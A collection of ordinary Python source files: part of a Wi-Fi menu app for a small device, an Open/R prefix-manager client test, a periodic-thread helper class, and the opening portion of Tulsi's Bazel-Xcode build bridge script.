update_menu()
og.redraw_flag = True
# update menu based on connection status
def update_menu():
dots = ['.','..','...','....']
menu_lock.acquire()
try :
# update wifi network labels
if (wifi.state == wifi.CONNECTING) :
menu.header = 'Connecting'+dots[wifi.connecting_timer % 4]
update_net_status_label('.')
elif (wifi.state == wifi.CONNECTED) :
menu.header = 'Connected ' + wifi.current_net
update_net_status_label('*')
elif (wifi.state == wifi.DISCONNECTING) :
menu.header = 'Disconnecting..'
update_net_status_label('-')
elif (wifi.state == wifi.CONNECTION_ERROR) :
menu.header = 'Problem Connecting'
update_net_status_label('-')
else :
menu.header = 'Not Connected'
update_net_status_label('-')
# update webserver menu entry
if (wifi.web_server_state == wifi.WEB_SERVER_RUNNING) :
update_web_server_menu_entry(True)
else :
update_web_server_menu_entry(False)
# update webserver menu entry
if (wifi.ap_state == wifi.AP_RUNNING) :
update_ap_menu_entry(True)
else :
update_ap_menu_entry(False)
finally :
menu_lock.release()
# show connected status for each network
def update_net_status_label(stat):
# check entries that have stashed net info (I know)
for i in range(len(menu.items)) :
try :
if (menu.items[i][2]['type'] == 'net') :
if (menu.items[i][2]['ssid'] == wifi.current_net) :
menu.items[i][0] = ' '+stat+' ' + menu.items[i][2]['ssid']
else :
menu.items[i][0] = ' - ' + menu.items[i][2]['ssid']
except :
pass
def update_web_server_menu_entry(stat):
if (stat) :
label = 'Stop Web Server'
action = stop_web
else :
        label = 'Start Web Server'
action = start_web
for i in range(len(menu.items)) :
try :
if (menu.items[i][2]['type'] == 'web_server_control') :
menu.items[i][0] = label
menu.items[i][1] = action
except :
pass
def update_ap_menu_entry(stat):
if (stat) :
label = 'Stop AP'
action = stop_ap
else :
label = 'Start AP'
action = start_ap
for i in range(len(menu.items)) :
try :
if (menu.items[i][2]['type'] == 'ap_control') :
menu.items[i][0] = label
menu.items[i][1] = action
except :
pass
# bg connection checker
def check_status():
while True:
time.sleep(1)
wifi.update_state()
update_menu()
og.redraw_flag = True
def non():
pass
def error_wifi_file() :
og.clear_screen()
og.println(0, "Error with wifi.txt")
og.println(2, "Please check file")
og.println(3, "is in the correct")
og.println(4, "format.")
og.flip()
og.enc_input()
quit()
# build main menu
menu.items = []
menu.header='Not Connected'
# start it up
og.start_app()
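# Illustrative wifi.txt layout (an assumption inferred from the parsing below:
# SSID and password on alternating lines; the values shown are placeholders):
#   MyHomeNetwork
#   hunter2
#   OfficeWifi
#   s3cret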
# check for wifi file, create one if not found
wifi_file = user_dir + "/wifi.txt"
if os.path.exists(wifi_file):
f = open(user_dir + "/wifi.txt", "r")
else :
print "wifi file not found, creating"
f = open(user_dir + "/wifi.txt", "w")
f.write("Network Name\n")
f.write("password\n")
f.close()
f = open(user_dir + "/wifi.txt", "r")
try :
networks = f.readlines()
networks = [x.strip() for x in networks]
ssids = networks[0::2]
pws = networks[1::2]
for i in range(len(ssids)) :
if (ssids[i] != '') :
ssid = ssids[i]
pw = pws[i]
net = WifiNet()
net.ssid = ssid
net.pw = pw
menu.items.append([' - ' + ssid, net.connect, {'type':'net', 'ssid':ssid}]) # stash some extra info with these net entries
except :
error_wifi_file()
print "bad wifi file"
menu.items.append(['Start Web Server', non, {'type':'web_server_control'}])
menu.items.append(['Start AP', non, {'type':'ap_control'}])
menu.items.append(['Turn Wifi Off', disconnect])
menu.items.append(['< Home', quit])
menu.selection = 0
# bg thread
menu_updater = threading.Thread(target=check_status)
menu_updater.daemon = True # stop the thread when we exit
wifi.initialize_state()
update_menu()
og.redraw_flag = True
# start thread to update connection status
menu_updater.start()
# enter menu
menu.perform()
|
prefix_mgr_client_tests.py
|
#!/usr/bin/env python
#
# Copyright (c) 2014-present, Facebook, Inc.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
#
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
from openr.utils import socket
from openr.clients import prefix_mgr_client
from openr.PrefixManager import ttypes as prefix_mgr_types
from openr.Lsdb import ttypes as lsdb_types
from openr.cli.utils.utils import ip_str_to_prefix, sprint_prefix
import zmq
import unittest
from multiprocessing import Process
prefix_entry1 = lsdb_types.PrefixEntry(
prefix=ip_str_to_prefix('2620:0:1cff:dead:bef1:ffff:ffff:1/128'),
type=lsdb_types.PrefixType.LOOPBACK)
prefix_entry2 = lsdb_types.PrefixEntry(
prefix=ip_str_to_prefix('2620:0:1cff:dead:bef1:ffff:ffff:2/128'),
type=lsdb_types.PrefixType.LOOPBACK)
prefix_entry3 = lsdb_types.PrefixEntry(
prefix=ip_str_to_prefix('2620:0:1cff:dead:bef1:ffff:ffff:3/128'),
type=lsdb_types.PrefixType.LOOPBACK)
class PrefixMgr():
def __init__(self, zmq_ctx, url):
self._prefix_mgr_server_socket = socket.Socket(zmq_ctx, zmq.REP)
self._prefix_mgr_server_socket.bind(url)
self._prefix_map = {sprint_prefix(prefix_entry1.prefix): prefix_entry1,
sprint_prefix(prefix_entry2.prefix): prefix_entry2,
sprint_prefix(prefix_entry3.prefix): prefix_entry3}
def process_request(self):
req = self._prefix_mgr_server_socket.recv_thrift_obj(
prefix_mgr_types.PrefixManagerRequest)
if req.cmd == prefix_mgr_types.PrefixManagerCommand.ADD_PREFIXES:
for prefix_entry in req.prefixes:
self._prefix_map[sprint_prefix(prefix_entry.prefix)] = prefix_entry
self._prefix_mgr_server_socket.send_thrift_obj(
prefix_mgr_types.PrefixManagerResponse(success=True))
if req.cmd == prefix_mgr_types.PrefixManagerCommand.WITHDRAW_PREFIXES:
success = False
for prefix_entry in req.prefixes:
prefix_str = sprint_prefix(prefix_entry.prefix)
if prefix_str in self._prefix_map:
del self._prefix_map[prefix_str]
success = True
self._prefix_mgr_server_socket.send_thrift_obj(
prefix_mgr_types.PrefixManagerResponse(success=success))
if req.cmd == prefix_mgr_types.PrefixManagerCommand.GET_ALL_PREFIXES:
resp = prefix_mgr_types.PrefixManagerResponse()
resp.prefixes = self._prefix_map.values()
resp.success = True
self._prefix_mgr_server_socket.send_thrift_obj(resp)
class TestPrefixMgrClient(unittest.TestCase):
def test(self):
PrefixMgr(zmq.Context(), "tcp://*:5000")
num_req = 5
def _prefix_mgr_server():
prefix_mgr_server = PrefixMgr(zmq.Context(), "tcp://*:5000")
for _ in range(num_req):
prefix_mgr_server.process_request()
def _prefix_mgr_client():
prefix_mgr_client_inst = prefix_mgr_client.PrefixMgrClient(
zmq.Context(), "tcp://localhost:5000")
resp = prefix_mgr_client_inst.add_prefix(
'2620:0:1cff:dead:bef1:ffff:ffff:4/128')
self.assertTrue(resp.success)
resp = prefix_mgr_client_inst.view_prefix()
prefix_entry4 = lsdb_types.PrefixEntry(
prefix=ip_str_to_prefix('2620:0:1cff:dead:bef1:ffff:ffff:4/128'),
type=lsdb_types.PrefixType.LOOPBACK)
self.assertTrue(resp.success)
self.assertTrue(prefix_entry4 in resp.prefixes)
resp = prefix_mgr_client_inst.withdraw_prefix(
'2620:0:1cff:dead:bef1:ffff:ffff:4/128')
self.assertTrue(resp.success)
resp = prefix_mgr_client_inst.view_prefix()
self.assertTrue(resp.success)
self.assertFalse(prefix_entry4 in resp.prefixes)
resp = prefix_mgr_client_inst.withdraw_prefix(
'2620:0:1cff:dead:bef1:ffff:ffff:5/128')
self.assertFalse(resp.success)
p = Process(target=_prefix_mgr_server)
p.start()
q = Process(target=_prefix_mgr_client)
q.start()
p.join()
q.join()
|
threaded.py
|
# -*- coding: utf-8 -*-
import logging
import time
from threading import Condition
from threading import Thread
logging.getLogger(__name__).setLevel(logging.INFO) # DEBUG, INFO, WARNING, ERROR, CRITICAL
class Threaded(object):
"""Provides a _thread which executes the _run() method at regular intervals.
Features:
- Thread supervision by ThreadMonitor
- Correct logging when exception occurs
- Thread reacts immediately on exit loop request (_thread_should_run)
"""
log = logging.getLogger(__name__)
def __init__(self, control_interval_in_seconds=4.0, thread_monitor=None, **kwargs):
super(Threaded, self).__init__(**kwargs)
self._thread_monitor = thread_monitor # type: ThreadMonitor
self._thread = None # type: Thread # Thread executing the needed behavior
self._thread_should_run = True # Controls the loop of the _thread
self._thread_left_run_loop = False # Set to true when _thread is leaving run loop
self._control_interval_in_seconds = control_interval_in_seconds # Time to wait until next processing
self._sleep_condition = Condition()
def setup_thread(self, name=None, thread_monitor=None):
if thread_monitor:
assert not self._thread_monitor, 'Thread monitor should be initialized only once!'
self._thread_monitor = thread_monitor
if not name:
name = self.__class__.__name__
# Create a _thread that regularly polls the actual parameters of the real battery
self._thread = Thread(target=self._run_with_exception_logging, name=name)
# Close _thread as soon as main _thread exits
self._thread.setDaemon(True)
if self._thread_monitor:
# Register _thread for later monitor of itself. Thread monitor allows to take action
# in case the _thread crashes.
self._thread_monitor.register(self._thread)
def start_thread(self):
if self._thread is None:
            self.log.warning('Thread not created. Calling setup_thread() for you!')
self.setup_thread()
# Reset run attributes
self._thread_should_run = True
self._thread_left_run_loop = False
self._thread.start()
def stop_thread(self):
# Remove _thread from monitor
if self._thread_monitor:
self._thread_monitor.deregister(self._thread)
# Tell _thread it should leave
self._thread_should_run = False
# Wait until it is gone
if self._thread.is_alive():
self.wait_on_thread_to_leave()
# Delete instance
del self._thread
self._thread = None
def wakeup_thread(self):
"""Wakes up _thread in case it is sleeping.
"""
# Release _thread waiting on condition
with self._sleep_condition:
self._sleep_condition.notify()
def join(self):
"""Wait for the internal _thread until it leaves.
Call stop_thread() to properly and quickly stop the internal _thread.
"""
if self._thread:
self._thread.join()
def _run_with_exception_logging(self):
"""Same as _run but logs exceptions to the console or log file.
This is necessary when running in testing/production environment.
In case of an exception thrown, the stack trace can be seen in the
log file. Otherwise there is no info why the _thread did stop.
"""
try:
self._run()
except Exception as e:
logging.error(e, exc_info=True)
finally:
# Wait here for a while. If leaving the method directly, the _thread
# gets deleted and the is_alive() method won't work any more!
time.sleep(5)
return
def _thread_sleep_interval(self, sleep_interval_in_seconds=None):
"""Tells the executing _thread how long to sleep while being still reactive on _thread_should_run attribute.
"""
if sleep_interval_in_seconds is not None:
waitTime = sleep_interval_in_seconds
else:
waitTime = self._control_interval_in_seconds
if self._sleep_condition.acquire(blocking=False):
# Sleep the time given. Thread can be waken up with self._sleep_condition.notify()
# see wakeup_thread()
try:
self._sleep_condition.wait(timeout=waitTime)
except RuntimeError as e: # pragma: no cover
self.log.exception(e)
finally:
self._sleep_condition.release()
return True
else:
self.log.error('Could not acquire sleep condition!') # pragma: no cover
return False # pragma: no cover
def _run(self):
assert False, 'Method needs to be implemented in derived class!'
""" Example loop:
while self._thread_should_run:
# Add your stuff here
print('Executes in a regular manner')
# Wait until next interval begins
if self._thread_should_run:
self._thread_sleep_interval()
self._thread_left_run_loop = True
"""
def wait_on_thread_to_leave(self, timeout=3):
"""Can be called to wait for the _thread until it left the run loop.
        Replacement for self._thread.join(), which has proven to react
        slowly; this method is used instead.
"""
wait_time = timeout
decr_value = 0.2
if self._thread_left_run_loop:
return
while wait_time > 0:
time.sleep(decr_value)
wait_time -= decr_value
if self._thread_left_run_loop:
break
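# Illustrative usage sketch (not part of the original module; the subclass name
# and its body are assumptions mirroring the example loop documented in _run):
#   class Poller(Threaded):
#       def _run(self):
#           while self._thread_should_run:
#               pass  # periodic work goes here
#               if self._thread_should_run:
#                   self._thread_sleep_interval()
#           self._thread_left_run_loop = True
#
#   p = Poller(control_interval_in_seconds=2.0)
#   p.setup_thread(name='poller')
#   p.start_thread()
#   ...
#   p.stop_thread()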
|
bazel_build.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright 2016 The Tulsi Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Bridge between Xcode and Bazel for the "build" action."""
import atexit
import errno
import fcntl
import hashlib
import inspect
import io
import json
import os
import pipes
import plistlib
import re
import shutil
import signal
import subprocess
import sys
import textwrap
import threading
import time
import zipfile
from apfs_clone_copy import CopyOnWrite
import bazel_build_events
import bazel_build_settings
import bazel_options
from bootstrap_lldbinit import BootstrapLLDBInit
from bootstrap_lldbinit import TULSI_LLDBINIT_FILE
import tulsi_logging
from update_symbol_cache import UpdateSymbolCache
# List of frameworks that Xcode injects into test host targets that should be
# re-signed when running the tests on devices.
XCODE_INJECTED_FRAMEWORKS = [
'libXCTestBundleInject.dylib',
'libXCTestSwiftSupport.dylib',
'IDEBundleInjection.framework',
'XCTAutomationSupport.framework',
'XCTest.framework',
]
_logger = None
def _PrintUnbuffered(msg):
sys.stdout.write('%s\n' % msg)
sys.stdout.flush()
def _PrintXcodeWarning(msg):
sys.stdout.write(':: warning: %s\n' % msg)
sys.stdout.flush()
def _PrintXcodeError(msg):
sys.stderr.write(':: error: %s\n' % msg)
sys.stderr.flush()
def _Fatal(msg, fatal_frame=None):
"""Print a fatal error pointing to the failure line inside the script."""
if not fatal_frame:
fatal_frame = inspect.currentframe().f_back
filename, line_number, _, _, _ = inspect.getframeinfo(fatal_frame)
_PrintUnbuffered('%s:%d: error: %s' % (os.path.abspath(filename),
line_number, msg))
CLEANUP_BEP_FILE_AT_EXIT = False
# Function to be called atexit to clean up the BEP file if one is present.
# This is especially useful in cases of abnormal termination (such as what
# happens when Xcode is killed).
def _BEPFileExitCleanup(bep_file_path):
if not CLEANUP_BEP_FILE_AT_EXIT:
return
try:
os.remove(bep_file_path)
except OSError as e:
_PrintXcodeWarning('Failed to remove BEP file from %s. Error: %s' %
(bep_file_path, e.strerror))
def _InterruptHandler(signum, frame):
"""Gracefully exit on SIGINT."""
del signum, frame # Unused.
_PrintUnbuffered('Caught interrupt signal. Exiting...')
sys.exit(0)
def _FindDefaultLldbInit():
"""Returns the path to the primary lldbinit file that Xcode would load or None when no file exists."""
for lldbinit_shortpath in ['~/.lldbinit-Xcode', '~/.lldbinit']:
lldbinit_path = os.path.expanduser(lldbinit_shortpath)
if os.path.isfile(lldbinit_path):
return lldbinit_path
return None
class Timer(object):
"""Simple profiler."""
def __init__(self, action_name, action_id):
"""Creates a new Timer object.
Args:
action_name: A human-readable action name, shown in the build log.
action_id: A machine-readable action identifier, can be used for metrics.
Returns:
A Timer instance.
Raises:
RuntimeError: if Timer is created without initializing _logger.
"""
if _logger is None:
raise RuntimeError('Attempted to create Timer without a logger.')
self.action_name = action_name
self.action_id = action_id
self._start = None
def Start(self):
self._start = time.time()
return self
def End(self, log_absolute_times=False):
end = time.time()
seconds = end - self._start
if log_absolute_times:
_logger.log_action(self.action_name, self.action_id, seconds,
self._start, end)
else:
_logger.log_action(self.action_name, self.action_id, seconds)
def _LockFileCreate():
# This relies on this script running at the root of the bazel workspace.
cwd = os.environ['PWD']
cwd_hash = hashlib.sha256(cwd.encode()).hexdigest()
return '/tmp/tulsi_bazel_build_{}.lock'.format(cwd_hash)
# Function to be called atexit to release the file lock on script termination.
def _LockFileExitCleanup(lock_file_handle):
lock_file_handle.close()
def _LockFileAcquire(lock_path):
"""Force script to wait on file lock to serialize build target actions.
Args:
lock_path: Path to the lock file.
"""
_PrintUnbuffered('Queuing Tulsi build...')
lockfile = open(lock_path, 'w')
# Register "fclose(...)" as early as possible, before acquiring lock.
atexit.register(_LockFileExitCleanup, lockfile)
while True:
try:
fcntl.lockf(lockfile, fcntl.LOCK_EX | fcntl.LOCK_NB)
break
except IOError as err:
if err.errno != errno.EAGAIN:
raise
else:
time.sleep(0.1)
class CodesignBundleAttributes(object):
"""Wrapper class for codesigning attributes of a signed bundle."""
# List of codesigning attributes that this script requires.
_ATTRIBUTES = ['Authority', 'Identifier', 'TeamIdentifier']
def __init__(self, codesign_output):
self.attributes = {}
pending_attributes = list(self._ATTRIBUTES)
for line in codesign_output.split('\n'):
if not pending_attributes:
break
for attribute in pending_attributes:
if line.startswith(attribute):
value = line[len(attribute) + 1:]
self.attributes[attribute] = value
pending_attributes.remove(attribute)
break
for attribute in self._ATTRIBUTES:
if attribute not in self.attributes:
_PrintXcodeError(
'Failed to extract %s from %s.\n' % (attribute, codesign_output))
def Get(self, attribute):
"""Returns the value for the given attribute, or None if it wasn't found."""
value = self.attributes.get(attribute)
if attribute not in self._ATTRIBUTES:
_PrintXcodeError(
'Attribute %s not declared to be parsed. ' % attribute +
'Available attributes are %s.\n' % self._ATTRIBUTES)
return value
class _OptionsParser(object):
"""Handles parsing script options."""
# List of all supported Xcode configurations.
KNOWN_CONFIGS = ['Debug', 'Release']
def __init__(self, build_settings, sdk_version, platform_name, arch):
self.targets = []
self.build_settings = build_settings
self.common_build_options = [
'--verbose_failures',
'--bes_outerr_buffer_size=0', # Don't buffer Bazel output.
]
self.sdk_version = sdk_version
self.platform_name = platform_name
if self.platform_name.startswith('watch'):
config_platform = 'watchos'
elif self.platform_name.startswith('iphone'):
config_platform = 'ios'
elif self.platform_name.startswith('macos'):
config_platform = 'macos'
elif self.platform_name.startswith('appletv'):
config_platform = 'tvos'
else:
self._WarnUnknownPlatform()
config_platform = 'ios'
self.bazel_build_config = '{}_{}'.format(config_platform, arch)
if self.bazel_build_config not in build_settings.platformConfigFlags:
_PrintXcodeError('Unknown active compilation target of "{}". '
'Please report a Tulsi bug.'
.format(self.bazel_build_config))
sys.exit(1)
self.verbose = 0
self.bazel_bin_path = 'bazel-bin'
self.bazel_executable = None
@staticmethod
def _UsageMessage():
"""Returns a usage message string."""
usage = textwrap.dedent("""\
Usage: %s <target> [<target2> ...] --bazel <bazel_binary_path> [options]
Where options are:
--verbose [-v]
Increments the verbosity of the script by one level. This argument
may be provided multiple times to enable additional output levels.
--bazel_bin_path <path>
Path at which Bazel-generated artifacts may be retrieved.
""" % sys.argv[0])
return usage
def ParseOptions(self, args):
"""Parses arguments, returning (message, exit_code)."""
bazel_executable_index = args.index('--bazel')
self.targets = args[:bazel_executable_index]
if not self.targets or len(args) < bazel_executable_index + 2:
return (self._UsageMessage(), 10)
self.bazel_executable = args[bazel_executable_index + 1]
return self._ParseVariableOptions(args[bazel_executable_index + 2:])
def GetBaseFlagsForTargets(self, config):
is_debug = config == 'Debug'
return self.build_settings.flags_for_target(
self.targets[0],
is_debug,
self.bazel_build_config)
def GetEnabledFeatures(self):
"""Returns a list of enabled Bazel features for the active target."""
return self.build_settings.features_for_target(self.targets[0])
def GetBazelOptions(self, config):
"""Returns the full set of build options for the given config."""
bazel, start_up, build = self.GetBaseFlagsForTargets(config)
all_build = []
all_build.extend(self.common_build_options)
all_build.extend(build)
xcode_version_flag = self._ComputeXcodeVersionFlag()
if xcode_version_flag:
all_build.append('--xcode_version=%s' % xcode_version_flag)
return bazel, start_up, all_build
def _WarnUnknownPlatform(self):
_PrintUnbuffered('Warning: unknown platform "%s" will be treated as '
'iOS' % self.platform_name)
def _ParseVariableOptions(self, args):
"""Parses flag-based args, returning (message, exit_code)."""
verbose_re = re.compile('-(v+)$')
while args:
arg = args[0]
args = args[1:]
if arg == '--bazel_bin_path':
if not args:
return ('Missing required parameter for %s' % arg, 2)
self.bazel_bin_path = args[0]
args = args[1:]
elif arg == '--verbose':
self.verbose += 1
else:
match = verbose_re.match(arg)
if match:
self.verbose += len(match.group(1))
else:
return ('Unknown option "%s"\n%s' % (arg, self._UsageMessage()), 1)
return (None, 0)
@staticmethod
def _GetXcodeBuildVersionString():
"""Returns Xcode build version from the environment as a string."""
return os.environ['XCODE_PRODUCT_BUILD_VERSION']
@staticmethod
def _GetXcodeVersionString():
"""Returns Xcode version info from the Xcode's version.plist.
Just reading XCODE_VERSION_ACTUAL from the environment seems like
    a more reasonable implementation, but it has been shown to be unreliable,
at least when using Xcode 11.3.1 and opening the project within an
Xcode workspace.
"""
developer_dir = os.environ['DEVELOPER_DIR']
app_dir = developer_dir.split('.app')[0] + '.app'
version_plist_path = os.path.join(app_dir, 'Contents', 'version.plist')
try:
# python2 API to plistlib - needs updating if/when Tulsi bumps to python3
plist = plistlib.readPlist(version_plist_path)
except IOError:
_PrintXcodeWarning('Tulsi cannot determine Xcode version, error '
'reading from {}'.format(version_plist_path))
return None
try:
# Example: "11.3.1", "11.3", "11.0"
key = 'CFBundleShortVersionString'
version_string = plist[key]
except KeyError:
_PrintXcodeWarning('Tulsi cannot determine Xcode version from {}, no '
'"{}" key'.format(version_plist_path, key))
return None
# But we need to normalize to major.minor.patch, e.g. 11.3.0 or
# 11.0.0, so add one or two ".0" if needed (two just in case
# there is ever just a single version number like "12")
dots_count = version_string.count('.')
dot_zeroes_to_add = 2 - dots_count
version_string += '.0' * dot_zeroes_to_add
return version_string
@staticmethod
def _ComputeXcodeVersionFlag():
"""Returns a string for the --xcode_version build flag, if any.
The flag should be used if the active Xcode version was not the same one
used during project generation.
Note this a best-attempt only; this may not be accurate as Bazel itself
caches the active DEVELOPER_DIR path and the user may have changed their
installed Xcode version.
"""
xcode_version = _OptionsParser._GetXcodeVersionString()
build_version = _OptionsParser._GetXcodeBuildVersionString()
if not xcode_version or not build_version:
return None
# Of the form Major.Minor.Fix.Build (new Bazel form) or Major.Min.Fix (old).
full_bazel_version = os.environ.get('TULSI_XCODE_VERSION')
if not full_bazel_version: # Unexpected: Tulsi gen didn't set the flag.
return xcode_version
# Newer Bazel versions specify the version as Major.Minor.Fix.Build.
if full_bazel_version.count('.') == 3:
components = full_bazel_version.rsplit('.', 1)
bazel_xcode_version = components[0]
bazel_build_version = components[1]
if (xcode_version != bazel_xcode_version
or build_version != bazel_build_version):
return '{}.{}'.format(xcode_version, build_version)
else:
return None
else: # Old version of Bazel. We need to use form Major.Minor.Fix.
return xcode_version if xcode_version != full_bazel_version else None
class BazelBuildBridge(object):
"""Handles invoking Bazel and unpacking generated binaries."""
BUILD_EVENTS_FILE = 'build_events.json'
def __init__(self, build_settings):
self.build_settings = build_settings
self.verbose = 0
self.bazel_bin_path = None
self.codesign_attributes = {}
self.codesigning_folder_path = os.environ['CODESIGNING_FOLDER_PATH']
self.xcode_action = os.environ['ACTION'] # The Xcode build action.
# When invoked as an external build system script, Xcode will set ACTION to
# an empty string.
if not self.xcode_action:
self.xcode_action = 'build'
if int(os.environ['XCODE_VERSION_MAJOR']) < 900:
xcode_build_version = os.environ['XCODE_PRODUCT_BUILD_VERSION']
_PrintXcodeWarning('Tulsi officially supports Xcode 9+. You are using an '
'earlier Xcode, build %s.' % xcode_build_version)
self.tulsi_version = os.environ.get('TULSI_VERSION', 'UNKNOWN')
self.custom_lldbinit = os.environ.get('TULSI_LLDBINIT_FILE')
# TODO(b/69857078): Remove this when wrapped_clang is updated.
self.direct_debug_prefix_map = False
self.normalized_prefix_map = False
self.update_symbol_cache = UpdateSymbolCache()
# Path into which generated artifacts should be copied.
self.built_products_dir = os.environ['BUILT_PRODUCTS_DIR']
# Path where Xcode expects generated sources to be placed.
self.derived_sources_folder_path = os.environ.get('DERIVED_SOURCES_DIR')
# Full name of the target artifact (e.g., "MyApp.app" or "Test.xctest").
self.full_product_name = os.environ['FULL_PRODUCT_NAME']
# Whether to generate runfiles for this target.
self.gen_runfiles = os.environ.get('GENERATE_RUNFILES')
# Target SDK version.
self.sdk_version = os.environ.get('SDK_VERSION')
# TEST_HOST for unit tests.
self.test_host_binary = os.environ.get('TEST_HOST')
# Whether this target is a test or not.
self.is_test = os.environ.get('WRAPPER_EXTENSION') == 'xctest'
# Target platform.
self.platform_name = os.environ['PLATFORM_NAME']
# Type of the target artifact.
self.product_type = os.environ['PRODUCT_TYPE']
# Path to the parent of the xcodeproj bundle.
self.project_dir = os.environ['PROJECT_DIR']
# Path to the xcodeproj bundle.
self.project_file_path = os.environ['PROJECT_FILE_PATH']
# Path to the directory containing the WORKSPACE file.
self.workspace_root = os.path.abspath(os.environ['TULSI_WR'])
# Set to the name of the generated bundle for bundle-type targets, None for
# single file targets (like static libraries).
self.wrapper_name = os.environ.get('WRAPPER_NAME')
self.wrapper_suffix = os.environ.get('WRAPPER_SUFFIX', '')
# Path where Xcode expects the artifacts to be written to. This is not the
# codesigning_path as device vs simulator builds have different signing
# requirements, so Xcode expects different paths to be signed. This is
# mostly apparent on XCUITests where simulator builds set the codesigning
# path to be the .xctest bundle, but for device builds it is actually the
# UI runner app (since it needs to be codesigned to run on the device.) The
# FULL_PRODUCT_NAME variable is a stable path on where to put the expected
# artifacts. For static libraries (objc_library, swift_library),
# FULL_PRODUCT_NAME corresponds to the .a file name, which coincides with
# the expected location for a single artifact output.
# TODO(b/35811023): Check these paths are still valid.
self.artifact_output_path = os.path.join(
os.environ['TARGET_BUILD_DIR'],
os.environ['FULL_PRODUCT_NAME'])
# Path to where Xcode expects the binary to be placed.
self.binary_path = os.path.join(
os.environ['TARGET_BUILD_DIR'], os.environ['EXECUTABLE_PATH'])
self.is_simulator = self.platform_name.endswith('simulator')
# Check to see if code signing actions should be skipped or not.
if self.is_simulator:
self.codesigning_allowed = False
else:
self.codesigning_allowed = os.environ.get('CODE_SIGNING_ALLOWED') == 'YES'
# Target architecture. Must be defined for correct setting of
# the --cpu flag. Note that Xcode will set multiple values in
# ARCHS when building for a Generic Device.
archs = os.environ.get('ARCHS')
if not archs:
_PrintXcodeError('Tulsi requires env variable ARCHS to be '
'set. Please file a bug against Tulsi.')
sys.exit(1)
arch = archs.split()[-1]
if self.is_simulator and arch == "arm64":
self.arch = "sim_" + arch
else:
self.arch = arch
if self.codesigning_allowed:
platform_prefix = 'iOS'
if self.platform_name.startswith('macos'):
platform_prefix = 'macOS'
entitlements_filename = '%sXCTRunner.entitlements' % platform_prefix
self.runner_entitlements_template = os.path.join(self.project_file_path,
'.tulsi',
'Resources',
entitlements_filename)
self.bazel_executable = None
def Run(self, args):
"""Executes a Bazel build based on the environment and given arguments."""
if self.xcode_action != 'build':
sys.stderr.write('Xcode action is %s, ignoring.' % self.xcode_action)
return 0
parser = _OptionsParser(self.build_settings,
self.sdk_version,
self.platform_name,
self.arch)
timer = Timer('Parsing options', 'parsing_options').Start()
message, exit_code = parser.ParseOptions(args[1:])
timer.End()
if exit_code:
_PrintXcodeError('Option parsing failed: %s' % message)
return exit_code
self.verbose = parser.verbose
self.bazel_bin_path = os.path.abspath(parser.bazel_bin_path)
self.bazel_executable = parser.bazel_executable
self.bazel_exec_root = self.build_settings.bazelExecRoot
self.bazel_output_base = self.build_settings.bazelOutputBase
# Update feature flags.
features = parser.GetEnabledFeatures()
self.direct_debug_prefix_map = 'DirectDebugPrefixMap' in features
self.normalized_prefix_map = 'DebugPathNormalization' in features
# Path to the Build Events JSON file uses pid and is removed if the
# build is successful.
filename = '%d_%s' % (os.getpid(), BazelBuildBridge.BUILD_EVENTS_FILE)
self.build_events_file_path = os.path.join(
self.project_file_path,
'.tulsi',
filename)
(command, retval) = self._BuildBazelCommand(parser)
if retval:
return retval
timer = Timer('Running Bazel', 'running_bazel').Start()
exit_code, outputs = self._RunBazelAndPatchOutput(command)
timer.End()
if exit_code:
_Fatal('Bazel build failed with exit code %d. Please check the build '
'log in Report Navigator (⌘9) for more information.'
% exit_code)
return exit_code
post_bazel_timer = Timer('Total Tulsi Post-Bazel time', 'total_post_bazel')
post_bazel_timer.Start()
# This needs to run after `bazel build`, since it depends on the Bazel
# output directories
if not os.path.exists(self.bazel_exec_root):
_Fatal('No Bazel execution root was found at %r. Debugging experience '
'will be compromised. Please report a Tulsi bug.'
% self.bazel_exec_root)
return 404
if not os.path.exists(self.bazel_output_base):
_Fatal('No Bazel output base was found at %r. Editing experience '
'will be compromised for external workspaces. Please report a'
' Tulsi bug.'
% self.bazel_output_base)
return 404
exit_code = self._LinkTulsiToBazel('tulsi-execution-root', self.bazel_exec_root)
if exit_code:
return exit_code
# Old versions of Tulsi mis-referred to the execution root as the workspace.
# We preserve the old symlink name for backwards compatibility.
exit_code = self._LinkTulsiToBazel('tulsi-workspace', self.bazel_exec_root)
if exit_code:
return exit_code
exit_code = self._LinkTulsiToBazel(
'tulsi-output-base', self.bazel_output_base)
if exit_code:
return exit_code
exit_code, outputs_data = self._ExtractAspectOutputsData(outputs)
if exit_code:
return exit_code
# Generated headers are installed on a thread since we are launching
# a separate process to do so. This gives us clean timings.
install_thread = threading.Thread(
target=self._InstallGeneratedHeaders, args=(outputs,))
install_thread.start()
timer = Timer('Installing artifacts', 'installing_artifacts').Start()
exit_code = self._InstallArtifact(outputs_data)
timer.End()
install_thread.join()
if exit_code:
return exit_code
exit_code, dsym_paths = self._InstallDSYMBundles(
self.built_products_dir, outputs_data)
if exit_code:
return exit_code
if not dsym_paths:
# Clean any bundles from a previous build that can interfere with
# debugging in LLDB.
self._CleanExistingDSYMs()
else:
for path in dsym_paths:
# Starting with Xcode 9.x, a plist based remapping exists for dSYM
# bundles that works with Swift as well as (Obj-)C(++).
#
# This solution also works for Xcode 8.x for (Obj-)C(++) but not
# for Swift.
timer = Timer('Adding remappings as plists to dSYM',
'plist_dsym').Start()
exit_code = self._PlistdSYMPaths(path)
timer.End()
if exit_code:
_PrintXcodeError('Remapping dSYMs process returned %i, please '
'report a Tulsi bug and attach a full Xcode '
'build log.' % exit_code)
return exit_code
# Starting with Xcode 7.3, XCTests inject several supporting frameworks
# into the test host that need to be signed with the same identity as
# the host itself.
if (self.is_test and not self.platform_name.startswith('macos') and
self.codesigning_allowed):
exit_code = self._ResignTestArtifacts()
if exit_code:
return exit_code
# Starting with Xcode 8, .lldbinit files are honored during Xcode debugging
# sessions. This allows use of the target.source-map field to remap the
# debug symbol paths encoded in the binary to the paths expected by Xcode.
#
# This will not work with dSYM bundles, or a direct -fdebug-prefix-map from
# the Bazel-built locations to Xcode-visible sources.
timer = Timer('Updating .lldbinit', 'updating_lldbinit').Start()
